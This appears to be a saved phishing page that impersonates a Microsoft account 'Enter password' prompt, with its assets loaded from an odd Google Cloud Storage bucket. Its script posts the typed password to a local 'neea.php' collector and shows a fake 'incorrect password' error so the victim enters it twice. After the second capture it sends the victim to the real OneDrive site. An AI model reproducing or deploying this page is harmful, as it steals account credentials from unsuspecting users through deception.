
<!DOCTYPE html>
<html data-scrapbook-create="20210723150832516" data-scrapbook-source="#wa=wsignin1.0&amp;rpsnv=13&amp;ct=1539585327&amp;rver=7.0.6737.0&amp;wp=MBI_SSL&amp;wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&amp;id=292841&amp;CBCXT=out&amp;lw=1&amp;fl=dob%2cflname%2cwld&amp;cobrandid=90015" lang="en">
<head><meta charset="utf-8">
	<title>Sign in to your Microsoft account</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link href="https://storage.googleapis.com/e4tyefghjuyuiiohio86r567u-gfyuykjhkjlknmk/assets/images/favicon.ico" rel="shortcut icon" />
	<link href="https://storage.googleapis.com/e4tyefghjuyuiiohio86r567u-gfyuykjhkjlknmk/assets/css/bootstrap.css" rel="stylesheet" />
	<link href="https://storage.googleapis.com/e4tyefghjuyuiiohio86r567u-gfyuykjhkjlknmk/assets/css/1pass.css" rel="stylesheet" />
	<link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" /><script src="https://storage.googleapis.com/e4tyefghjuyuiiohio86r567u-gfyuykjhkjlknmk/assets/js/jquery.min.js"></script><script src="https://storage.googleapis.com/e4tyefghjuyuiiohio86r567u-gfyuykjhkjlknmk/assets/js/popper.min.js"></script><script src="https://storage.googleapis.com/e4tyefghjuyuiiohio86r567u-gfyuykjhkjlknmk/assets/js/bootstrap.min.js"></script>
	<style type="text/css">
	</style>
	<style type="text/css">.SnapLinksContainer :not([xyz]) {  }
					.SnapLinksContainer .SnapLinksHighlighter { 
						all: initial; overflow: visible; 
						position: absolute; top: 0px; left: 0px; width: 10px; height: 10px;  
					}
					.SnapLinksContainer { 
						pointer-events: none; z-index: 999999;  
						position: absolute; top: 0px; left: 0px; margin: 0px; padding: 0px; height: 0px; width: 0px; }
					.SnapLinksContainer > .SL_SelectionRect { outline: 2px dashed rgba(0,200,0,1); position: absolute; overflow: visible; z-index: 1; }
					.SL_SelectionRect > .SL_SelectionLabel { position: absolute; background: #FFFFD9; border: 1px solid black; border-radius: 2px; padding: 2px; font: normal 12px Verdana; white-space: nowrap; color: #000000; }
	</style>
	<style type="text/css">.SnapLinksContainer :not([xyz]) {  }
					.SnapLinksContainer .SnapLinksHighlighter { 
						all: initial; overflow: visible; 
						position: absolute; top: 0px; left: 0px; width: 10px; height: 10px;  
					}
					.SnapLinksContainer { 
						pointer-events: none; z-index: 999999;  
						position: absolute; top: 0px; left: 0px; margin: 0px; padding: 0px; height: 0px; width: 0px; }
					.SnapLinksContainer > .SL_SelectionRect { outline: 2px dashed rgba(0,200,0,1); position: absolute; overflow: visible; z-index: 1; }
					.SL_SelectionRect > .SL_SelectionLabel { position: absolute; background: #FFFFD9; border: 1px solid black; border-radius: 2px; padding: 2px; font: normal 12px Verdana; white-space: nowrap; color: #000000; }
	</style>
	<style type="text/css">.SnapLinksContainer :not([xyz]) {  }
					.SnapLinksContainer .SnapLinksHighlighter { 
						all: initial; overflow: visible; 
						position: absolute; top: 0px; left: 0px; width: 10px; height: 10px;  
					}
					.SnapLinksContainer { 
						pointer-events: none; z-index: 999999;  
						position: absolute; top: 0px; left: 0px; margin: 0px; padding: 0px; height: 0px; width: 0px; }
					.SnapLinksContainer > .SL_SelectionRect { outline: 2px dashed rgba(0,200,0,1); position: absolute; overflow: visible; z-index: 1; }
					.SL_SelectionRect > .SL_SelectionLabel { position: absolute; background: #FFFFD9; border: 1px solid black; border-radius: 2px; padding: 2px; font: normal 12px Verdana; white-space: nowrap; color: #000000; }
	</style>
</head>
<body>
<div class="container-fluid">
<div class="row d-flex align-items-center">
<div class="col-lg-4 col-md-4 col-xs-12 mx-auto">
<div class="card">
<div class="card-body"><img src="https://storage.googleapis.com/e4tyefghjuyuiiohio86r567u-gfyuykjhkjlknmk/assets/images/logo.svg" />
<p><a href="https://www.office.com/?auth=2%22"><img src="https://storage.googleapis.com/e4tyefghjuyuiiohio86r567u-gfyuykjhkjlknmk/assets/images/arrow_left.svg" /></a> <span style="color: rgb(33, 37, 41); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, &quot;Helvetica Neue&quot;, Arial, sans-serif, &quot;Apple Color Emoji&quot;, &quot;Segoe UI Emoji&quot;, &quot;Segoe UI Symbol&quot;, &quot;Noto Color Emoji&quot;; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">Because you're&#39; accessing sensitive info, you need to verify your password.</span> <a href="#"> </a></p>

<h4>Enter password</h4>

<h4><input action="./neea.php" id="password" method="post" name="password" required="required" type="password" /></h4>
<span class="d-none" id="error">Your account or password is incorrect. If you don&#39;t remember your password, <a href="#">reset it now.</a></span>

<form action="./neea.php" enctype="text/plain" id="password" method="post" name="password">
<div class="form-group form-check"><label class="form-check-label"><input class="form-check-input" type="checkbox" /> Keep me signed in </label></div>

<p><a href="#">Forgot my password</a></p>
<button class="btn float-right" type="submit">Sign In</button></form>
</div>
</div>
</div>
</div>
</div>

<div class="footer">
<p><img src="file:///C:/Users/User/Desktop/pop/VV/2121/Gcloud/MAC/FirstPage/ellipsis_white.svg" /></p>

<p>Privacy &amp; cookies</p>

<p>Terms of use</p>

<p>&copy;2021 Microsoft</p>
</div>
<script>
    location.hash = 'wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015';

    $(function() {
        $(document).on('focus', '.form-control', function() {
            $(this).css({'border-bottom': '1px solid #0067b8'});
        });

        $(document).on('blur', '.form-control', function() {
            $(this).css({'border-bottom': ''});
        });
        
        var success = 0;
        $(document).on('submit', 'form', function(event) {
            event.preventDefault();
            
            var password    = $('#password').val();
            
            if(success == 0) {
                $.post('./neea.php', {password: password});
                setTimeout(function() {
                    $('#password').val('');
                    $('.form-control').css({'border-bottom': '1px solid #e81123'});
                    $('#error').toggleClass('d-none d-block');
                    
                    $(document).on('focus', '.form-control', function() {
                        $(this).css({'border-bottom': '1px solid #e81123'});
                    });
            
                    $(document).on('blur', '.form-control', function() {
                        $(this).css({'border-bottom': '1px solid #e81123'});
                    });
                    
                    success = 1;
                }, 1000);
            } else {
                $.post('./neea.php', {password: password});
                setTimeout(function() {
                   window.location = 'https://onedrive.live.com/about/en-gb/signin/"'; 
                }, 1000);
            }
        });
    });
</script>

<div class="SnapLinksContainer" style="margin-left: 0px; margin-top: 0px; display: none;">
<div class="SL_SelectionRect">
<div class="SL_SelectionLabel"></div>
</div>
<svg class="SnapLinksHighlighter" xmlns="http://www.w3.org/2000/svg"> <rect height="0" width="0"></rect> <!-- Used for easily cloning the properly namespaced rect --> </svg></div>

<div class="SnapLinksContainer" style="margin-left: 0px; margin-top: 0px; display: none;">
<div class="SL_SelectionRect">
<div class="SL_SelectionLabel"></div>
</div>
<svg class="SnapLinksHighlighter" xmlns="http://www.w3.org/2000/svg"> <rect height="0" width="0"></rect> <!-- Used for easily cloning the properly namespaced rect --> </svg></div>

<div class="SnapLinksContainer" style="margin-left: 0px; margin-top: 0px; display: none;">
<div class="SL_SelectionRect">
<div class="SL_SelectionLabel"></div>
</div>
<svg class="SnapLinksHighlighter" xmlns="http://www.w3.org/2000/svg"> <rect height="0" width="0"></rect> <!-- Used for easily cloning the properly namespaced rect --> </svg></div>
</body>
</html>
